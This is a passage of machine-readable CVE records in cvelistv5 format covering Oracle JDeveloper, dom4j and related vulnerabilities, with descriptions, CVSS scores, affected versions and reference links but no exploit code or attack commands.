"f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2017-5645", datePublished: "2017-04-17T21:00:00", dateReserved: "2017-01-29T00:00:00", dateUpdated: "2024-08-05T15:11:47.391Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2018-2711
Vulnerability from cvelistv5
Published
2018-01-18 02:00
Modified
2024-10-03 20:27
Severity ?
EPSS score ?
Summary
Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Security Framework). Supported versions that are affected are 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html | x_refsource_CONFIRM | |
| http://www.securitytracker.com/id/1040207 | vdb-entry, x_refsource_SECTRACK | |
| http://www.securityfocus.com/bid/102539 | vdb-entry, x_refsource_BID |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Oracle Corporation | JDeveloper |
Version: 11.1.1.2.4 Version: 11.1.1.7.0 Version: 11.1.1.7.1 Version: 11.1.1.9.0 Version: 12.1.3.0.0 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T04:29:44.131Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { name: "1040207", tags: [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id/1040207", }, { name: "102539", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/102539", }, ], title: "CVE Program Container", }, { metrics: [ { other: { content: { id: "CVE-2018-2711", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-10-03T19:24:30.502336Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-10-03T20:27:37.811Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { product: "JDeveloper", vendor: "Oracle Corporation", versions: [ { status: "affected", version: "11.1.1.2.4", }, { status: "affected", version: "11.1.1.7.0", }, { status: "affected", version: "11.1.1.7.1", }, { status: "affected", version: "11.1.1.9.0", }, { status: "affected", version: "12.1.3.0.0", }, ], }, ], datePublic: "2018-01-03T00:00:00", descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Security Framework). Supported versions that are affected are 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", }, ], problemTypes: [ { descriptions: [ { description: "Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data.", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2018-01-18T10:57:01", orgId: "43595867-4340-4103-b7a2-9a5208d29a85", shortName: "oracle", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { name: "1040207", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id/1040207", }, { name: "102539", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/102539", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "secalert_us@oracle.com", ID: "CVE-2018-2711", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "JDeveloper", version: { version_data: [ { version_affected: "=", version_value: "11.1.1.2.4", }, { version_affected: "=", version_value: "11.1.1.7.0", }, { version_affected: "=", version_value: "11.1.1.7.1", }, { version_affected: "=", version_value: "11.1.1.9.0", }, { version_affected: "=", version_value: "12.1.3.0.0", }, ], }, }, ], }, vendor_name: "Oracle Corporation", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Security Framework). Supported versions that are affected are 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data.", }, ], }, ], }, references: { reference_data: [ { name: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { name: "1040207", refsource: "SECTRACK", url: "http://www.securitytracker.com/id/1040207", }, { name: "102539", refsource: "BID", url: "http://www.securityfocus.com/bid/102539", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "43595867-4340-4103-b7a2-9a5208d29a85", assignerShortName: "oracle", cveId: "CVE-2018-2711", datePublished: "2018-01-18T02:00:00", dateReserved: "2017-12-15T00:00:00", dateUpdated: "2024-10-03T20:27:37.811Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2020-10683
Vulnerability from cvelistv5
Published
2020-05-01 18:55
Modified
2024-08-04 11:06
Severity ?
EPSS score ?
Summary
dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j.
References
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T11:06:11.156Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "openSUSE-SU-2020:0719", tags: [ "vendor-advisory", "x_refsource_SUSE", "x_transferred", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/dom4j/dom4j/releases/tag/version-2.1.3", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/dom4j/dom4j/commit/a8228522a99a02146106672a34c104adbda5c658", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20200518-0002/", }, { name: "USN-4575-1", tags: [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred", ], url: "https://usn.ubuntu.com/4575-1/", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/dom4j/dom4j/issues/87", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/dom4j/dom4j/commits/version-2.0.3", }, { name: "[velocity-dev] 20201203 Use of external DTDs - CVE-2020-10683", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8%40%3Cdev.velocity.apache.org%3E", }, { name: "[velocity-dev] 20201203 Re: Use of external DTDs - CVE-2020-10683", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32%40%3Cdev.velocity.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { name: "[freemarker-notifications] 20210906 [jira] [Created] (FREEMARKER-190) The jar dom4j has known security issue that Freemarker compiles dependend on it", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51%40%3Cnotifications.freemarker.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2020-04-12T00:00:00", descriptions: [ { lang: "en", value: "dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2022-07-25T16:13:36", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { name: "openSUSE-SU-2020:0719", tags: [ "vendor-advisory", "x_refsource_SUSE", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html", }, { tags: [ "x_refsource_MISC", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/dom4j/dom4j/releases/tag/version-2.1.3", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/dom4j/dom4j/commit/a8228522a99a02146106672a34c104adbda5c658", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20200518-0002/", }, { name: "USN-4575-1", tags: [ "vendor-advisory", "x_refsource_UBUNTU", ], url: "https://usn.ubuntu.com/4575-1/", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/dom4j/dom4j/issues/87", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/dom4j/dom4j/commits/version-2.0.3", }, { name: "[velocity-dev] 20201203 Use of external DTDs - CVE-2020-10683", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8%40%3Cdev.velocity.apache.org%3E", }, { name: "[velocity-dev] 20201203 Re: Use of external DTDs - CVE-2020-10683", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32%40%3Cdev.velocity.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { name: "[freemarker-notifications] 20210906 [jira] [Created] (FREEMARKER-190) The jar dom4j has known security issue that Freemarker compiles dependend on it", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51%40%3Cnotifications.freemarker.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2020-10683", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "openSUSE-SU-2020:0719", refsource: "SUSE", url: "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html", }, { name: "https://www.oracle.com/security-alerts/cpujul2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { name: "https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html", refsource: "MISC", url: "https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html", }, { name: "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", refsource: "MISC", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", }, { name: "https://github.com/dom4j/dom4j/releases/tag/version-2.1.3", refsource: "CONFIRM", url: "https://github.com/dom4j/dom4j/releases/tag/version-2.1.3", }, { name: "https://github.com/dom4j/dom4j/commit/a8228522a99a02146106672a34c104adbda5c658", refsource: "CONFIRM", url: "https://github.com/dom4j/dom4j/commit/a8228522a99a02146106672a34c104adbda5c658", }, { name: "https://security.netapp.com/advisory/ntap-20200518-0002/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20200518-0002/", }, { name: "USN-4575-1", refsource: "UBUNTU", url: "https://usn.ubuntu.com/4575-1/", }, { name: "https://www.oracle.com/security-alerts/cpuoct2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { name: "https://github.com/dom4j/dom4j/issues/87", refsource: "MISC", url: "https://github.com/dom4j/dom4j/issues/87", }, { name: "https://github.com/dom4j/dom4j/commits/version-2.0.3", refsource: "MISC", url: "https://github.com/dom4j/dom4j/commits/version-2.0.3", }, { name: "[velocity-dev] 20201203 Use of external DTDs - CVE-2020-10683", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8@%3Cdev.velocity.apache.org%3E", }, { name: "[velocity-dev] 20201203 Re: Use of external DTDs - CVE-2020-10683", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32@%3Cdev.velocity.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpujan2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { name: "https://www.oracle.com/security-alerts/cpuApr2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { name: "https://www.oracle.com//security-alerts/cpujul2021.html", refsource: "MISC", url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { name: "[freemarker-notifications] 20210906 [jira] [Created] (FREEMARKER-190) The jar dom4j has known security issue that Freemarker compiles dependend on it", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51@%3Cnotifications.freemarker.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpuoct2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { name: "https://www.oracle.com/security-alerts/cpujan2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { name: "https://www.oracle.com/security-alerts/cpujul2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2020-10683", datePublished: "2020-05-01T18:55:25", dateReserved: "2020-03-20T00:00:00", dateUpdated: "2024-08-04T11:06:11.156Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2019-2899
Vulnerability from cvelistv5
Published
2019-10-16 17:40
Modified
2024-10-01 16:32
Severity ?
EPSS score ?
Summary
Vulnerability in the Oracle JDeveloper and ADF product of Oracle Fusion Middleware (component: OAM). Supported versions that are affected are 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle JDeveloper and ADF. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper and ADF accessible data. CVSS 3.0 Base Score 2.4 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N).
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html | x_refsource_MISC | |
| https://www.oracle.com/security-alerts/cpuapr2020.html | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Oracle Corporation | Hyperion Financial Management |
Version: 11.1.2.4 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T19:03:43.148Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, ], title: "CVE Program Container", }, { metrics: [ { other: { content: { id: "CVE-2019-2899", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-10-01T16:15:27.715088Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-10-01T16:32:46.259Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { product: "Hyperion Financial Management", vendor: "Oracle Corporation", versions: [ { status: "affected", version: "11.1.2.4", }, ], }, ], descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper and ADF product of Oracle Fusion Middleware (component: OAM). Supported versions that are affected are 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle JDeveloper and ADF. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper and ADF accessible data. CVSS 3.0 Base Score 2.4 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N).", }, ], metrics: [ { cvssV3_0: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 2.4, baseSeverity: "LOW", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "HIGH", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N", version: "3.0", }, }, ], problemTypes: [ { descriptions: [ { description: "Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle JDeveloper and ADF. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper and ADF accessible data.", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2020-04-15T13:29:43", orgId: "43595867-4340-4103-b7a2-9a5208d29a85", shortName: "oracle", }, references: [ { tags: [ "x_refsource_MISC", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "secalert_us@oracle.com", ID: "CVE-2019-2899", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "Hyperion Financial Management", version: { version_data: [ { version_affected: "=", version_value: "11.1.2.4", }, ], }, }, ], }, vendor_name: "Oracle Corporation", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Vulnerability in the Oracle JDeveloper and ADF product of Oracle Fusion Middleware (component: OAM). Supported versions that are affected are 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle JDeveloper and ADF. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper and ADF accessible data. CVSS 3.0 Base Score 2.4 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N).", }, ], }, impact: { cvss: { baseScore: "2.4", vectorString: "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N", version: "3.0", }, }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle JDeveloper and ADF. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper and ADF accessible data.", }, ], }, ], }, references: { reference_data: [ { name: "http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", refsource: "MISC", url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "43595867-4340-4103-b7a2-9a5208d29a85", assignerShortName: "oracle", cveId: "CVE-2019-2899", datePublished: "2019-10-16T17:40:53", dateReserved: "2018-12-14T00:00:00", dateUpdated: "2024-10-01T16:32:46.259Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }